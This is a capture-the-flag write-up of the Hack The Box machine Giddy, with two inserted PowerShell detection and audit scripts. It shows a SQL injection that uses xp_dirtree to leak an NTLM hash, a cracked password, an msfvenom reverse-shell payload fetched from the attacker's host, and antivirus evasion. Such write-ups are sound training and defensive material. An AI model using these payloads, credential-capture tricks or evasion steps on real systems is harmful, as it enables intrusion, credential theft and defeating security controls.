
Hack The Box - Giddy

source link: https://www.tuicool.com/articles/hit/yqeYFfY

Quick Summary

Hey guys, today Giddy retired and this is my write-up. Giddy was a nice Windows box. It had a SQL injection vulnerability which we will use to steal an NTLM hash and log in, and the privilege escalation was a local privilege escalation vulnerability in a piece of software called Ubiquiti UniFi Video, which was also a cool vulnerability. I had fun doing this box as it was a challenging one. It's a Windows box and its IP is 10.10.10.104; I added it to /etc/hosts as giddy.htb. Let's jump right in.


Nmap

As always we will start with nmap to scan for open ports and services :

nmap -sV -sT -sC giddy.htb

nmap tells us that ports 80 and 443 are open and running HTTP; port 3389 is also open and it says "Microsoft Terminal Services". Let's check HTTP.

HTTP Enumeration

On http (port 80) there’s only this picture :


Also the same picture on https (port 443)


Let's run gobuster with directory-list-2.3-medium.txt and see what we get:

gobuster -u http://giddy.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -to 250s

Results :

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://giddy.htb/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 4m10s
=====================================================
2019/02/15 21:36:09 Starting gobuster
=====================================================
/remote (Status: 302)
/mvc (Status: 301)

We got 2 subdirectories: /remote and /mvc.

Let’s take a look at /remote :


It redirects us to a page titled Windows PowerShell Web Access. We don't have any credentials, so we can ignore this for now and check /mvc.


And we get this ASP.NET application.

SQLI and getting User

After some regular enumeration we find that when we click on a product name we get something like this:


The URL has a parameter called ProductSubCategoryId, and if we try a single quote ':


We get an error saying "Unclosed quotation mark after the character string", so this parameter is SQL injectable. Let's try something like: 1; UPDATE Product SET Name= ''


And we see that it dumped the products. We can run responder and use xp_dirtree to make the server try to connect to us; you can read about xp_dirtree here.

To do this, let's run responder first: responder -I tun0

Then let's use xp_dirtree: 1; EXEC MASTER.sys.xp_dirtree '\\10.10.xx.xx\fakeshare'


What this does is simple: responder runs a fake SMB server that captures NTLM hashes, and xp_dirtree makes the SQL server try to connect to that fake share, authenticating as the account the database runs under. Let's check responder now:
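As an added defensive example (not part of the original write-up): a PowerShell function that scans IIS W3C log lines for the pattern used above, a non-numeric ProductSubCategoryId, an xp_ extended procedure name, or a UNC path that would make SQL Server authenticate outbound. The log lines, the /mvc/Product.aspx path and the 10.10.14.5 client address are constructed for the example.

```powershell
# Constructed IIS W3C log sample (hypothetical path and client address, not from the box);
# cs-uri-query is where an injected ProductSubCategoryId value shows up.
$sampleLog = @'
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2019-02-15 21:40:01 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=1 80 - 10.10.14.5 200
2019-02-15 21:40:07 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=1%27 80 - 10.10.14.5 500
2019-02-15 21:41:22 10.10.10.104 GET /mvc/Product.aspx ProductSubCategoryId=1%3B%20EXEC%20MASTER.sys.xp_dirtree%20%27%5C%5C10.10.14.5%5Cfakeshare%27 80 - 10.10.14.5 200
'@

function Find-SqliAttempts {
    param([string[]]$Lines)
    # Each pattern is one reason to flag a request:
    #  - the id is not a plain integer (a quote, a semicolon, a stacked query)
    #  - an xp_ extended procedure name appears in the query string
    #  - a UNC path (\\host\share) appears, i.e. SQL Server is being pointed at a foreign SMB host
    $patterns = @(
        @{ Name = 'non-numeric id'; Regex = 'ProductSubCategoryId=(?!\d+(&|$))' },
        @{ Name = 'xp_ procedure';  Regex = '(?i)xp_(dirtree|fileexist|subdirs)' },
        @{ Name = 'UNC path';       Regex = '\\\\[^\\]+\\' }
    )
    foreach ($line in $Lines) {
        if ([string]::IsNullOrWhiteSpace($line) -or $line.StartsWith('#')) { continue }
        $fields = $line -split ' '
        # Decode percent-encoding so %27 / %5C are compared as ' and \
        $query  = [System.Uri]::UnescapeDataString($fields[5])
        $hits   = @($patterns | Where-Object { $query -match $_.Regex } | ForEach-Object { $_.Name })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time   = "$($fields[0]) $($fields[1])"
                Client = $fields[8]
                Status = $fields[9]
                Reason = ($hits -join ', ')
                Query  = $query
            }
        }
    }
}

# Run over the constructed sample; only requests whose query matches a pattern are returned.
Find-SqliAttempts -Lines ($sampleLog -split "`r?`n") | Format-Table -AutoSize
```

Blocking outbound SMB (TCP 445) from the database host stops the hash from leaving even when the injected query runs; the real fix is a parameterized query for ProductSubCategoryId.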


We captured the NTLM hash of a user called Stacy. Let's crack the hash with john:


And the password is xNnWo6272k7x. Let's use the PowerShell Web Access:


We get this web interface for PowerShell:


We can get the user flag now :


And we owned user!

unifivideo local privilege escalation

If we return to Documents we will find a file called unifivideo:


UniFi Video is a powerful and flexible, integrated IP video management surveillance system designed to work with Ubiquiti’s UniFi Video Camera product line. UniFi Video has an intuitive, configurable, and feature‑packed user interface with advanced features such as motion detection, auto‑discovery, user-level security, storage management, reporting, and mobile device support.  

A quick Google search shows that an old version of UniFi Video had a local privilege escalation vulnerability; check it here.

What happens is this: when the "Ubiquiti UniFi Video" service starts, it tries to execute a file called taskkill.exe in C:\ProgramData\unifi-video\, but that file doesn't exist by default. If we have write permissions to that directory we can place our payload there as taskkill.exe and restart the service, and because the service runs with privileged permissions, our payload will be executed as administrator.
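An added audit check, written for this commentary and not part of the original post: it verifies from the defender's side the two conditions the hijack needs (a C:\ProgramData\unifi-video directory writable by broad groups, and a taskkill.exe already planted there) and shows which account the service runs as. Run it in an elevated PowerShell on the host; the service name and directory are the ones the write-up gives.

```powershell
$serviceName = 'Ubiquiti UniFi Video'
$dir         = 'C:\ProgramData\unifi-video'
$hijackFile  = Join-Path $dir 'taskkill.exe'

function Test-UnifiVideoHijackPath {
    param([string]$Directory, [string]$File)
    $result = [ordered]@{
        DirectoryExists   = Test-Path -LiteralPath $Directory
        HijackFilePresent = Test-Path -LiteralPath $File
        WritableBy        = @()
    }
    if ($result.DirectoryExists) {
        # An Allow ACE that grants any write right to a broad group is what lets an
        # unprivileged user plant the binary the service looks for on start-up.
        $acl = Get-Acl -LiteralPath $Directory
        foreach ($ace in $acl.Access) {
            $broad = $ace.IdentityReference.Value -match '(\\Users|\\Authenticated Users|^Everyone)$'
            $write = "$($ace.FileSystemRights)" -match 'Write|Modify|FullControl|CreateFiles'
            if ($ace.AccessControlType -eq 'Allow' -and $broad -and $write) {
                $result.WritableBy += $ace.IdentityReference.Value
            }
        }
    }
    [pscustomobject]$result
}

$report = Test-UnifiVideoHijackPath -Directory $dir -File $hijackFile
$report | Format-List

if ($report.HijackFilePresent) {
    # The real taskkill.exe lives in System32; anything by that name under ProgramData is suspect.
    Write-Warning "Unexpected $hijackFile found; hashes for comparison:"
    Get-FileHash -LiteralPath $hijackFile, "$env:SystemRoot\System32\taskkill.exe" -Algorithm SHA256 |
        Select-Object Path, Hash
}
if ($report.WritableBy.Count -gt 0) {
    Write-Warning "$dir is writable by: $($report.WritableBy -join ', ')"
    # Remediation (as administrator, after reviewing the ACL): remove the broad write ACE, e.g.
    #   icacls $dir /remove:g "BUILTIN\Users"
}

# Show the account the service runs as; a privileged StartName is what turns a writable
# directory into a privilege escalation.
Get-CimInstance Win32_Service -Filter "Name='$serviceName' OR DisplayName='$serviceName'" |
    Select-Object Name, StartName, State, PathName
```

Numeric (generic) rights in an ACE are not matched by the string check, so review the full Get-Acl output if WritableBy comes back empty on a directory you still suspect.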

Let’s first create a payload with msfvenom :

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.xx.xx LPORT=1337 -f exe > taskkill.exe

We will set up the handler in Metasploit:

use multi/handler
set payload windows/meterpreter_reverse_tcp
set LHOST 10.10.xx.xx
set LPORT 1337

Then we will run a simple HTTP server with Python to host the payload:

python -m SimpleHTTPServer 80

After that we will download the file; since we are in PowerShell we can do this:

Invoke-WebRequest -OutFile taskkill.exe http://10.10.xx.xx/taskkill.exe

Then we will stop the service :

Stop-Service "Ubiquiti UniFi Video"

Start it again :

Start-Service "Ubiquiti UniFi Video"

Let's check our listener:


We didn't get a meterpreter session!

Evading anti-virus and getting root

We didn't get a meterpreter session because some kind of anti-virus is blocking our payload, so what I'm going to do is use a framework called Phantom Evasion; you can get it from GitHub.


We will use [1] Windows modules, then [1] shellcode injection, then [4] Windows shellcode injection heapalloc; after that it will ask for the payload:


We will choose Msfvenom.

And for encoding we will choose [4] x86/xor_dynamic + Triple Multibyte-key xor:


It will ask about adding multi-process behaviour, and about stripping and signing the executable; we will say no to all of them, and finally we will have our payload.

We will repeat what we did with the other payload, then check our listener:


We got a meterpreter session and owned root!

That's it, feedback is appreciated!

Don't forget to read the previous write-ups, tweet about the write-up if you liked it, and follow me on Twitter for awesome resources: @Ahm3d_H3sham

Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ypuffy

